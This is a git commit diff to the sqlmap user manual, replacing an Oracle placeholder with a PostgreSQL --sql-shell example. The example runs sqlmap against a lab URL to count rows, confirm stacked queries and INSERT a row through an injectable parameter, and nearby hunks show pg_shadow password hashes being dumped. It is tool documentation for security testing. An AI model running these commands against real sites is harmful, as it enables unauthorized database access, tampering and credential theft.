mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
Almost ready with the user's manual for 0.6.4 release
This commit is contained in:
parent
77d9d22ceb
commit
9ab174a444
|
@ -3545,7 +3545,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql
|
||||||
"SELECT usename FROM pg_user" -v 0
|
"SELECT usename FROM pg_user" -v 0
|
||||||
|
|
||||||
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
||||||
[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries
|
[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries
|
||||||
do you want to retrieve?
|
do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
|
@ -3643,11 +3643,10 @@ do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
[q] Quit
|
[q] Quit
|
||||||
Choice:
|
Choice: 2
|
||||||
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
||||||
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
||||||
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
||||||
[*] testuser2,
|
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
@ -3788,22 +3787,42 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the
|
||||||
column names of the table then asks if the query can return multiple
|
column names of the table then asks if the query can return multiple
|
||||||
entries and goes on.</P>
|
entries and goes on.</P>
|
||||||
|
|
||||||
<P>Example of SQL statement other than <CODE>SELECT</CODE> on an <B>Oracle XE
|
<P>Example of SQL statement other than <CODE>SELECT</CODE> on a <B>PostgreSQL
|
||||||
10.2.0.1</B> target:</P>
|
8.3.5</B> target:</P>
|
||||||
<P>
|
<P>
|
||||||
<BLOCKQUOTE><CODE>
|
<BLOCKQUOTE><CODE>
|
||||||
<PRE>
|
<PRE>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: Oracle
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
|
[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
|
||||||
sql> TODO
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:11:59] [INFO] retrieved: 4
|
||||||
|
[10:11:59] [INFO] performed 13 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '4'
|
||||||
|
|
||||||
|
sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
|
||||||
|
[10:12:35] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');'
|
||||||
|
[10:12:40] [INFO] done
|
||||||
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:12:53] [INFO] retrieved: 5
|
||||||
|
[10:12:54] [INFO] performed 20 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '5'
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
|
||||||
|
<P>TODO</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">File system access</A>
|
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">File system access</A>
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
|
@ -3448,7 +3448,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql
|
||||||
"SELECT usename FROM pg_user" -v 0
|
"SELECT usename FROM pg_user" -v 0
|
||||||
|
|
||||||
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
||||||
[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries
|
[hh:mm:37] [INPUT] the SQL query provided can return up to 3 entries. How many entries
|
||||||
do you want to retrieve?
|
do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
|
@ -3544,11 +3544,10 @@ do you want to retrieve?
|
||||||
[a] All (default)
|
[a] All (default)
|
||||||
[#] Specific number
|
[#] Specific number
|
||||||
[q] Quit
|
[q] Quit
|
||||||
Choice:
|
Choice: 2
|
||||||
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
||||||
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
[*] postgres, md5d7d880f96044b72d0bba108ace96d1e4
|
||||||
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
[*] testuser, md599e5ea7a6f7c3269995cba3927fd0093
|
||||||
[*] testuser2,
|
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
@ -3686,19 +3685,40 @@ column names of the table then asks if the query can return multiple
|
||||||
entries and goes on.
|
entries and goes on.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Example of SQL statement other than <tt>SELECT</tt> on an <bf>Oracle XE
|
Example of SQL statement other than <tt>SELECT</tt> on a <bf>PostgreSQL
|
||||||
10.2.0.1</bf> target:
|
8.3.5</bf> target:
|
||||||
|
|
||||||
<tscreen><verb>
|
<tscreen><verb>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: Oracle
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
|
[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
|
||||||
sql> TODO
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:11:59] [INFO] retrieved: 4
|
||||||
|
[10:11:59] [INFO] performed 13 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '4'
|
||||||
|
|
||||||
|
sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
|
||||||
|
[10:12:35] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');'
|
||||||
|
[10:12:40] [INFO] done
|
||||||
|
sql> SELECT COUNT(name) FROM users
|
||||||
|
[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
|
||||||
|
[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
|
||||||
|
[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) FROM users
|
||||||
|
[10:12:53] [INFO] retrieved: 5
|
||||||
|
[10:12:54] [INFO] performed 20 queries in 0 seconds
|
||||||
|
SELECT COUNT(name) FROM users: '5'
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
TODO
|
||||||
|
|
||||||
|
|
||||||
<sect1>File system access
|
<sect1>File system access
|
||||||
|
|
Loading…
Reference in New Issue
Block a user